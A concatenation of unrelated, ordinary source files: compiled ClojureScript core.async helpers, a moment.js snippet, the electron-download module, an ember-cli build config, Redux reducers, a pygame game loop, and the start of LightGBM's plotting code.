return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(G__29431,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,G__29431,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"finally-block","finally-block",832982472),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,G__29431,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,G__29431,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"prev","prev",-1597069226),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"prev","prev",-1597069226),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,G__29431,self__.__meta,self__.__extmap,null));
} else {
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(self__.__extmap,k__4447__auto__,G__29431),null));
}
}
}
}
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ISeqable$_seq$arity$1 = (function (this__4451__auto__){
var self__ = this;
var this__4451__auto____$1 = this;
return cljs.core.seq(cljs.core.concat.cljs$core$IFn$_invoke$arity$2(new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [(new cljs.core.MapEntry(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),self__.catch_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),self__.catch_exception,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"finally-block","finally-block",832982472),self__.finally_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),self__.continue_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"prev","prev",-1597069226),self__.prev,null))], null),self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IWithMeta$_with_meta$arity$2 = (function (this__4438__auto__,G__29431){
var self__ = this;
var this__4438__auto____$1 = this;
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,G__29431,self__.__extmap,self__.__hash));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICollection$_conj$arity$2 = (function (this__4444__auto__,entry__4445__auto__){
var self__ = this;
var this__4444__auto____$1 = this;
if(cljs.core.vector_QMARK_(entry__4445__auto__)){
return this__4444__auto____$1.cljs$core$IAssociative$_assoc$arity$3(null,cljs.core._nth(entry__4445__auto__,(0)),cljs.core._nth(entry__4445__auto__,(1)));
} else {
return cljs.core.reduce.cljs$core$IFn$_invoke$arity$3(cljs.core._conj,this__4444__auto____$1,entry__4445__auto__);
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.getBasis = (function (){
return new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Symbol(null,"catch-block","catch-block",-1479223021,null),cljs.core.with_meta(new cljs.core.Symbol(null,"catch-exception","catch-exception",-356775268,null),new cljs.core.PersistentArrayMap(null, 1, [new cljs.core.Keyword(null,"tag","tag",-1290361223),new cljs.core.Symbol(null,"Class","Class",2064526977,null)], null)),new cljs.core.Symbol(null,"finally-block","finally-block",-1821453297,null),new cljs.core.Symbol(null,"continue-block","continue-block",-211516323,null),new cljs.core.Symbol(null,"prev","prev",43462301,null)], null);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$type = true);
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$ctorPrSeq = (function (this__4482__auto__){
return (new cljs.core.List(null,"cljs.core.async.impl.ioc-helpers/ExceptionFrame",null,(1),null));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$ctorPrWriter = (function (this__4482__auto__,writer__4483__auto__){
return cljs.core._write(writer__4483__auto__,"cljs.core.async.impl.ioc-helpers/ExceptionFrame");
}));
/**
* Positional factory function for cljs.core.async.impl.ioc-helpers/ExceptionFrame.
*/
cljs.core.async.impl.ioc_helpers.__GT_ExceptionFrame = (function cljs$core$async$impl$ioc_helpers$__GT_ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,prev){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,prev,null,null,null));
});
/**
* Factory function for cljs.core.async.impl.ioc-helpers/ExceptionFrame, taking a map of keywords to field values.
*/
cljs.core.async.impl.ioc_helpers.map__GT_ExceptionFrame = (function cljs$core$async$impl$ioc_helpers$map__GT_ExceptionFrame(G__29435){
var extmap__4478__auto__ = (function (){var G__29477 = cljs.core.dissoc.cljs$core$IFn$_invoke$arity$variadic(G__29435,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),cljs.core.prim_seq.cljs$core$IFn$_invoke$arity$2([new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),new cljs.core.Keyword(null,"finally-block","finally-block",832982472),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),new cljs.core.Keyword(null,"prev","prev",-1597069226)], 0));
if(cljs.core.record_QMARK_(G__29435)){
return cljs.core.into.cljs$core$IFn$_invoke$arity$2(cljs.core.PersistentArrayMap.EMPTY,G__29477);
} else {
return G__29477;
}
})();
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(G__29435),null,cljs.core.not_empty(extmap__4478__auto__),null));
});
cljs.core.async.impl.ioc_helpers.add_exception_frame = (function cljs$core$async$impl$ioc_helpers$add_exception_frame(state,catch_block,catch_exception,finally_block,continue_block){
var statearr_29478 = state;
(statearr_29478[(4)] = cljs.core.async.impl.ioc_helpers.__GT_ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,cljs.core.async.impl.ioc_helpers.aget_object(state,(4))));
return statearr_29478;
});
cljs.core.async.impl.ioc_helpers.process_exception = (function cljs$core$async$impl$ioc_helpers$process_exception(state){
while(true){
var exception_frame = cljs.core.async.impl.ioc_helpers.aget_object(state,(4));
var catch_block = new cljs.core.Keyword(null,"catch-block","catch-block",1175212748).cljs$core$IFn$_invoke$arity$1(exception_frame);
var catch_exception = new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795).cljs$core$IFn$_invoke$arity$1(exception_frame);
var exception = cljs.core.async.impl.ioc_helpers.aget_object(state,(5));
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
return cljs.core.not(exception_frame);
} else {
return and__4174__auto__;
}
})())){
throw exception;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
var and__4174__auto____$1 = catch_block;
if(cljs.core.truth_(and__4174__auto____$1)){
return ((cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"default","default",-1987822328),catch_exception)) || ((exception instanceof catch_exception)));
} else {
return and__4174__auto____$1;
}
} else {
return and__4174__auto__;
}
})())){
var statearr_29486 = state;
(statearr_29486[(1)] = catch_block);
(statearr_29486[(2)] = exception);
(statearr_29486[(5)] = null);
(statearr_29486[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$variadic(exception_frame,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),null,cljs.core.prim_seq.cljs$core$IFn$_invoke$arity$2([new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),null], 0)));
return statearr_29486;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
return ((cljs.core.not(catch_block)) && (cljs.core.not(new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame))));
} else {
return and__4174__auto__;
}
})())){
var statearr_29487_29619 = state;
(statearr_29487_29619[(4)] = new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(exception_frame));
var G__29621 = state;
state = G__29621;
continue;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
if(cljs.core.not(catch_block)){
return new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame);
} else {
return false;
}
} else {
return and__4174__auto__;
}
})())){
var statearr_29488 = state;
(statearr_29488[(1)] = new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29488[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(exception_frame,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null));
return statearr_29488;
} else {
if(cljs.core.truth_(((cljs.core.not(exception))?new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame):false))){
var statearr_29489 = state;
(statearr_29489[(1)] = new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29489[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(exception_frame,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null));
return statearr_29489;
} else {
if(((cljs.core.not(exception)) && (cljs.core.not(new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame))))){
var statearr_29490 = state;
(statearr_29490[(1)] = new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29490[(4)] = new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(exception_frame));
return statearr_29490;
} else {
throw (new Error("No matching clause"));
}
}
}
}
}
}
break;
}
});
//# sourceMappingURL=cljs.core.async.impl.ioc_helpers.js.map
|
/**
* Created by yan on 15-7-6.
*/
var moment = require('moment');
document.write(moment().locale('zh-cn').format('LLLL'));
|
'use strict'
const arch = require('./arch')
const debug = require('debug')('electron-download')
const envPaths = require('env-paths')
const fs = require('fs-extra')
const rc = require('rc')
const nugget = require('nugget')
const os = require('os')
const path = require('path')
const pathExists = require('path-exists')
const semver = require('semver')
const sumchecker = require('sumchecker')
class ElectronDownloader {
constructor (opts) {
this.opts = Object.assign({ autoDownload: true }, opts)
if (this.opts.force && !this.opts.autoDownload) {
throw new Error('force and autoDownload options are incompatible for Electron Download')
}
this.npmrc = {}
try {
rc('npm', this.npmrc)
} catch (error) {
console.error(`Error reading npm configuration: ${error.message}`)
}
}
get baseUrl () {
if (this.version.indexOf('nightly') !== -1) {
return process.env.NPM_CONFIG_ELECTRON_NIGHTLY_MIRROR ||
process.env.npm_config_electron_nightly_mirror ||
process.env.npm_package_config_electron_nightly_mirror ||
process.env.ELECTRON_NIGHTLY_MIRROR ||
this.opts.nightly_mirror ||
'https://github.com/electron/nightlies/releases/download/v'
}
return process.env.NPM_CONFIG_ELECTRON_MIRROR ||
process.env.npm_config_electron_mirror ||
process.env.npm_package_config_electron_mirror ||
process.env.ELECTRON_MIRROR ||
this.opts.mirror ||
'https://github.com/electron/electron/releases/download/v'
}
get middleUrl () {
return process.env.NPM_CONFIG_ELECTRON_CUSTOM_DIR ||
process.env.npm_config_electron_custom_dir ||
process.env.npm_package_config_electron_custom_dir ||
process.env.ELECTRON_CUSTOM_DIR ||
this.opts.customDir ||
this.version
}
get urlSuffix () {
return process.env.NPM_CONFIG_ELECTRON_CUSTOM_FILENAME ||
process.env.npm_config_electron_custom_filename ||
process.env.npm_package_config_electron_custom_filename ||
process.env.ELECTRON_CUSTOM_FILENAME ||
this.opts.customFilename ||
this.filename
}
get arch () {
return this.opts.arch || arch.host(this.quiet)
}
get cache () {
const cacheLocation = this.opts.cache || process.env.ELECTRON_CACHE
if (cacheLocation) return cacheLocation
const oldCacheDirectory = path.join(os.homedir(), './.electron')
if (pathExists.sync(path.join(oldCacheDirectory, this.filename))) {
return oldCacheDirectory
}
// use passed argument or XDG environment variable fallback to OS default
return envPaths('electron', {suffix: ''}).cache
}
get cachedChecksum () {
return path.join(this.cache, `${this.checksumFilename}-${this.version}`)
}
get cachedZip () {
return path.join(this.cache, this.filename)
}
get checksumFilename () {
return 'SHASUMS256.txt'
}
get checksumUrl () {
return `${this.baseUrl}${this.middleUrl}/${this.checksumFilename}`
}
get filename () {
const type = `${this.platform}-${this.arch}`
const suffix = `v${this.version}-${type}`
if (this.chromedriver) {
// Chromedriver started using Electron's version in asset name in 1.7.0
if (semver.gte(this.version, '1.7.0')) {
return `chromedriver-${suffix}.zip`
} else {
return `chromedriver-v2.21-${type}.zip`
}
} else if (this.mksnapshot) {
return `mksnapshot-${suffix}.zip`
} else if (this.ffmpeg) {
return `ffmpeg-${suffix}.zip`
} else if (this.symbols) {
return `electron-${suffix}-symbols.zip`
} else if (this.dsym) {
return `electron-${suffix}-dsym.zip`
} else {
return `electron-${suffix}.zip`
}
}
get platform () {
return this.opts.platform || os.platform()
}
get proxy () {
let proxy
if (this.npmrc && this.npmrc.proxy) proxy = this.npmrc.proxy
if (this.npmrc && this.npmrc['https-proxy']) proxy = this.npmrc['https-proxy']
return proxy
}
get quiet () {
return this.opts.quiet || process.stdout.rows < 1
}
get strictSSL () {
let strictSSL = true
if (this.opts.strictSSL === false || this.npmrc['strict-ssl'] === false) {
strictSSL = false
}
return strictSSL
}
get force () {
return this.opts.force || false
}
get symbols () {
return this.opts.symbols || false
}
get dsym () {
return this.opts.dsym || false
}
get chromedriver () {
return this.opts.chromedriver || false
}
get mksnapshot () {
return this.opts.mksnapshot || false
}
get ffmpeg () {
return this.opts.ffmpeg || false
}
get url () {
return process.env.ELECTRON_DOWNLOAD_OVERRIDE_URL ||
`${this.baseUrl}${this.middleUrl}/${this.urlSuffix}`
}
get verifyChecksumNeeded () {
return !this.opts.disableChecksumSafetyCheck && semver.gte(this.version, '1.3.2')
}
get version () {
return this.opts.version
}
get headers () {
return this.opts.headers
}
checkForCachedChecksum (cb) {
pathExists(this.cachedChecksum)
.then(exists => {
if (exists && !this.force) {
this.verifyChecksum(cb)
} else {
this.downloadChecksum(cb)
}
})
}
checkForCachedZip (cb) {
pathExists(this.cachedZip).then(exists => {
if (exists && !this.force) {
debug('zip exists', this.cachedZip)
this.checkIfZipNeedsVerifying(cb)
} else if (this.opts.autoDownload) {
this.ensureCacheDir(cb)
} else {
cb(new Error(`File: "${this.cachedZip}" does not exist locally and autoDownload is false`))
}
})
}
checkIfZipNeedsVerifying (cb) {
if (this.verifyChecksumNeeded) {
debug('Verifying zip with checksum')
return this.checkForCachedChecksum(cb)
}
return cb(null, this.cachedZip)
}
createCacheDir (cb) {
fs.mkdirs(this.cache, (err) => {
if (err) {
if (err.code !== 'EACCES') return cb(err)
// try local folder if homedir is off limits (e.g. some linuxes return '/' as homedir)
const localCache = path.resolve('./.electron')
return fs.mkdirs(localCache, function (err) {
if (err) return cb(err)
cb(null, localCache)
})
}
cb(null, this.cache)
})
}
downloadChecksum (cb) {
this.downloadFile(this.checksumUrl, this.cachedChecksum, cb, this.verifyChecksum.bind(this))
}
downloadFile (url, cacheFilename, cb, onSuccess) {
const tempFileName = `tmp-${process.pid}-${(ElectronDownloader.tmpFileCounter++).toString(16)}-${path.basename(cacheFilename)}`
debug('downloading', url, 'to', this.cache)
const nuggetOpts = {
target: tempFileName,
dir: this.cache,
resume: true,
quiet: this.quiet,
strictSSL: this.strictSSL,
proxy: this.proxy,
headers: this.headers
}
nugget(url, nuggetOpts, (errors) => {
if (errors) {
// nugget returns an array of errors but we only need 1st because we only have 1 url
return this.handleDownloadError(cb, errors[0])
}
this.moveFileToCache(tempFileName, cacheFilename, cb, onSuccess)
})
}
downloadIfNotCached (cb) {
if (!this.version) return cb(new Error('must specify version'))
debug('info', {cache: this.cache, filename: this.filename, url: this.url})
this.checkForCachedZip(cb)
}
downloadZip (cb) {
this.downloadFile(this.url, this.cachedZip, cb, this.checkIfZipNeedsVerifying.bind(this))
}
ensureCacheDir (cb) {
debug('creating cache dir')
this.createCacheDir((err, actualCache) => {
if (err) return cb(err)
this.opts.cache = actualCache // in case cache dir changed
this.downloadZip(cb)
})
}
handleDownloadError (cb, error) {
if (error.message.indexOf('404') === -1) return cb(error)
if (this.symbols) {
error.message = `Failed to find Electron symbols v${this.version} for ${this.platform}-${this.arch} at ${this.url}`
} else {
error.message = `Failed to find Electron v${this.version} for ${this.platform}-${this.arch} at ${this.url}`
}
return cb(error)
}
moveFileToCache (filename, target, cb, onSuccess) {
const cache = this.cache
debug('moving', filename, 'from', cache, 'to', target)
fs.rename(path.join(cache, filename), target, (err) => {
if (err) {
fs.unlink(cache, cleanupError => {
try {
if (cleanupError) {
console.error(`Error deleting cache file: ${cleanupError.message}`)
}
} finally {
cb(err)
}
})
} else {
onSuccess(cb)
}
})
}
verifyChecksum (cb) {
const options = {}
if (semver.lt(this.version, '1.3.5')) {
options.defaultTextEncoding = 'binary'
}
const checker = new sumchecker.ChecksumValidator('sha256', this.cachedChecksum, options)
checker.validate(this.cache, this.filename).then(() => {
cb(null, this.cachedZip)
}, (err) => {
fs.unlink(this.cachedZip, (fsErr) => {
if (fsErr) return cb(fsErr)
cb(err)
})
})
}
}
ElectronDownloader.tmpFileCounter = 0
module.exports = function download (opts, cb) {
try {
const downloader = new ElectronDownloader(opts)
downloader.downloadIfNotCached(cb)
} catch (err) {
cb(err)
}
}
|
/* global require, module */
var EmberApp = require('ember-cli/lib/broccoli/ember-app');
module.exports = function(defaults) {
var app = new EmberApp(defaults, {
sassOptions: {
extension: 'sass'
}
});
// Use `app.import` to add additional libraries to the generated
// output files.
//
// If you need to use different assets in different
// environments, specify an object as the first parameter. That
// object's keys should be the environment name and the values
// should be the asset to use in that environment.
//
// If the library that you are including contains AMD or ES6
// modules that you would like to import into your application
// please specify an object with the list of modules as keys
// along with the exports of each module as its value.
app.import('bower_components/moment/moment.js');
return app.toTree();
};
|
export const setBoards = (state, action) => {
const { boards } = action;
return {
...state,
isFetching: false,
fetched: true,
data: boards,
};
};
export const setVisibilityRegistrationForm = (state, action) => {
const { value } = action;
return {
...state,
showRegistrationForm: value,
};
};
export const addCreatedBoard = (state, action) => {
const { board } = action;
return {
...state,
data: [...state.data, board],
};
};
export const deleteBoard = (state, action) => {
const { deletedBoardId } = action;
const newBoards = state.data.filter(({ _id }) => _id !== deletedBoardId);
return {
...state,
data: newBoards,
};
};
export const setError = (state, action) => {
const { error } = action;
return {
...state,
isFetching: false,
error,
};
};
export const updatePictureOfBoard = (state, action) => {
const { boardId, newPicture } = action;
const newData = state.data.map((board) => {
if (board._id === boardId) board.picture = newPicture;
return board;
});
return {
...state,
data: newData,
};
};
|
import sys
import pygame
from settings import Settings
from ship import Ship
import game_functions as gf
def run_game():
# 初始化游戏并创建一个屏幕对象
pygame.init()
ai_setting = Settings()
screen = pygame.display.set_mode((ai_setting.screen_width, ai_setting.screen_height))
pygame.display.set_caption("Alien Invasion")
# 创建一艘飞船
ship = Ship(ai_setting, screen)
# 开始游戏的主循环
while True:
# 监视键盘和鼠标事件
gf.check_events(ship)
ship.update()
# 更新屏幕
gf.update_screen(ai_setting, screen, ship)
run_game()
|
# coding: utf-8
"""Plotting library."""
from copy import deepcopy
from io import BytesIO
from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
from .basic import Booster, _log_warning
from .compat import GRAPHVIZ_INSTALLED, MATPLOTLIB_INSTALLED
from .sklearn import LGBMModel
def _check_not_tuple_of_2_elements(obj: Any, obj_name: str = 'obj') -> None:
"""Check object is not tuple or does not have 2 elements."""
if not isinstance(obj, tuple) or len(obj) != 2:
raise TypeError(f"{obj_name} must be a tuple of 2 elements.")
def _float2str(value: float, precision: Optional[int] = None) -> str:
return (f"{value:.{precision}f}"
if precision is not None and not isinstance(value, str)
else str(value))
def plot_importance(
booster: Union[Booster, LGBMModel],
ax=None,
height: float = 0.2,
xlim: Optional[Tuple[float, float]] = None,
ylim: Optional[Tuple[float, float]] = None,
title: Optional[str] = 'Feature importance',
xlabel: Optional[str] = 'Feature importance',
ylabel: Optional[str] = 'Features',
importance_type: str = 'auto',
max_num_features: Optional[int] = None,
ignore_zero: bool = True,
figsize: Optional[Tuple[float, float]] = None,
dpi: Optional[int] = None,
grid: bool = True,
precision: Optional[int] = 3,
**kwargs: Any
) -> Any:
"""Plot model's feature importances.
Parameters
----------
booster : Booster or LGBMModel
Booster or LGBMModel instance which feature importance should be plotted.
ax : matplotlib.axes.Axes or None, optional (default=None)
Target axes instance.
If None, new figure and axes will be created.
height : float, optional (default=0.2)
Bar height, passed to ``ax.barh()``.
xlim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.xlim()``.
ylim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.ylim()``.
title : str or None, optional (default="Feature importance")
Axes title.
If None, title is disabled.
xlabel : str or None, optional (default="Feature importance")
X-axis title label.
If None, title is disabled.
@importance_type@ placeholder can be used, and it will be replaced with the value of ``importance_type`` parameter.
ylabel : str or None, optional (default="Features")
Y-axis title label.
If None, title is disabled.
importance_type : str, optional (default="auto")
How the importance is calculated.
If "auto", if ``booster`` parameter is LGBMModel, ``booster.importance_type`` attribute is used; "split" otherwise.
If "split", result contains numbers of times the feature is used in a model.
If "gain", result contains total gains of splits which use the feature.
max_num_features : int or None, optional (default=None)
Max number of top features displayed on plot.
If None or <1, all features will be displayed.
ignore_zero : bool, optional (default=True)
Whether to ignore features with zero importance.
figsize : tuple of 2 elements or None, optional (default=None)
Figure size.
dpi : int or None, optional (default=None)
Resolution of the figure.
grid : bool, optional (default=True)
Whether to add a grid for axes.
precision : int or None, optional (default=3)
Used to restrict the display of floating point values to a certain precision.
**kwargs
Other parameters passed to ``ax.barh()``.
Returns
-------
ax : matplotlib.axes.Axes
The plot with model's feature importances.
"""
if MATPLOTLIB_INSTALLED:
import matplotlib.pyplot as plt
else:
raise ImportError('You must install matplotlib and restart your session to plot importance.')
if isinstance(booster, LGBMModel):
if importance_type == "auto":
importance_type = booster.importance_type
booster = booster.booster_
elif isinstance(booster, Booster):
if importance_type == "auto":
importance_type = "split"
else:
raise TypeError('booster must be Booster or LGBMModel.')
importance = booster.feature_importance(importance_type=importance_type)
feature_name = booster.feature_name()
if not len(importance):
raise ValueError("Booster's feature_importance is empty.")
tuples = sorted(zip(feature_name, importance), key=lambda x: x[1])
if ignore_zero:
tuples = [x for x in tuples if x[1] > 0]
if max_num_features is not None and max_num_features > 0:
tuples = tuples[-max_num_features:]
labels, values = zip(*tuples)
if ax is None:
if figsize is not None:
_check_not_tuple_of_2_elements(figsize, 'figsize')
_, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
ylocs = np.arange(len(values))
ax.barh(ylocs, values, align='center', height=height, **kwargs)
for x, y in zip(values, ylocs):
ax.text(x + 1, y,
_float2str(x, precision) if importance_type == 'gain' else x,
va='center')
ax.set_yticks(ylocs)
ax.set_yticklabels(labels)
if xlim is not None:
_check_not_tuple_of_2_elements(xlim, 'xlim')
else:
xlim = (0, max(values) * 1.1)
ax.set_xlim(xlim)
if ylim is not None:
_check_not_tuple_of_2_elements(ylim, 'ylim')
else:
ylim = (-1, len(values))
ax.set_ylim(ylim)
if title is not None:
ax.set_title(title)
if xlabel is not None:
xlabel = xlabel.replace('@importance_type@', importance_type)
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def plot_split_value_histogram(
booster: Union[Booster, LGBMModel],
feature: Union[int, str],
bins: Union[int, str, None] = None,
ax=None,
width_coef: float = 0.8,
xlim: Optional[Tuple[float, float]] = None,
ylim: Optional[Tuple[float, float]] = None,
title: Optional[str] = 'Split value histogram for feature with @index/name@ @feature@',
xlabel: Optional[str] = 'Feature split value',
ylabel: Optional[str] = 'Count',
figsize: Optional[Tuple[float, float]] = None,
dpi: Optional[int] = None,
grid: bool = True,
**kwargs: Any
) -> Any:
"""Plot split value histogram for the specified feature of the model.
Parameters
----------
booster : Booster or LGBMModel
Booster or LGBMModel instance of which feature split value histogram should be plotted.
feature : int or str
The feature name or index the histogram is plotted for.
If int, interpreted as index.
If str, interpreted as name.
bins : int, str or None, optional (default=None)
The maximum number of bins.
If None, the number of bins equals number of unique split values.
If str, it should be one from the list of the supported values by ``numpy.histogram()`` function.
ax : matplotlib.axes.Axes or None, optional (default=None)
Target axes instance.
If None, new figure and axes will be created.
width_coef : float, optional (default=0.8)
Coefficient for histogram bar width.
xlim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.xlim()``.
ylim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.ylim()``.
title : str or None, optional (default="Split value histogram for feature with @index/name@ @feature@")
Axes title.
If None, title is disabled.
@feature@ placeholder can be used, and it will be replaced with the value of ``feature`` parameter.
@index/name@ placeholder can be used,
and it will be replaced with ``index`` word in case of ``int`` type ``feature`` parameter
or ``name`` word in case of ``str`` type ``feature`` parameter.
xlabel : str or None, optional (default="Feature split value")
X-axis title label.
If None, title is disabled.
ylabel : str or None, optional (default="Count")
Y-axis title label.
If None, title is disabled.
figsize : tuple of 2 elements or None, optional (default=None)
Figure size.
dpi : int or None, optional (default=None)
Resolution of the figure.
grid : bool, optional (default=True)
Whether to add a grid for axes.
**kwargs
Other parameters passed to ``ax.bar()``.
Returns
-------
ax : matplotlib.axes.Axes
The plot with specified model's feature split value histogram.
"""
if MATPLOTLIB_INSTALLED:
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
else:
raise ImportError('You must install matplotlib and restart your session to plot split value histogram.')
if isinstance(booster, LGBMModel):
booster = booster.booster_
elif not isinstance(booster, Booster):
raise TypeError('booster must be Booster or LGBMModel.')
hist, bins = booster.get_split_value_histogram(feature=feature, bins=bins, xgboost_style=False)
if np.count_nonzero(hist) == 0:
raise ValueError('Cannot plot split value histogram, '
f'because feature {feature} was not used in splitting')
width = width_coef * (bins[1] - bins[0])
centred = (bins[:-1] + bins[1:]) / 2
if ax is None:
if figsize is not None:
_check_not_tuple_of_2_elements(figsize, 'figsize')
_, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
ax.bar(centred, hist, align='center', width=width, **kwargs)
if xlim is not None:
_check_not_tuple_of_2_elements(xlim, 'xlim')
else:
range_result = bins[-1] - bins[0]
xlim = (bins[0] - range_result * 0.2, bins[-1] + range_result * 0.2)
ax.set_xlim(xlim)
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
if ylim is not None:
_check_not_tuple_of_2_elements(ylim, 'ylim')
else:
ylim = (0, max(hist) * 1.1)
ax.set_ylim(ylim)
if title is not None:
title = title.replace('@feature@', str(feature))
title = title.replace('@index/name@', ('name' if isinstance(feature, str) else 'index'))
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def plot_metric(
booster: Union[Dict, LGBMModel],
metric: Optional[str] = None,
dataset_names: Optional[List[str]] = None,
ax=None,
xlim: Optional[Tuple[float, float]] = None,
ylim: Optional[Tuple[float, float]] = None,
title: Optional[str] = 'Metric during training',
xlabel: Optional[str] = 'Iterations',
ylabel: Optional[str] = '@metric@',
figsize: Optional[Tuple[float, float]] = None,
dpi: Optional[int] = None,
grid: bool = True
) -> Any:
"""Plot one metric during training.
Parameters
----------
booster : dict or LGBMModel
Dictionary returned from ``lightgbm.train()`` or LGBMModel instance.
metric : str or None, optional (default=None)
The metric name to plot.
Only one metric supported because different metrics have various scales.
If None, first metric picked from dictionary (according to hashcode).
dataset_names : list of str, or None, optional (default=None)
List of the dataset names which are used to calculate metric to plot.
If None, all datasets are used.
ax : matplotlib.axes.Axes or None, optional (default=None)
Target axes instance.
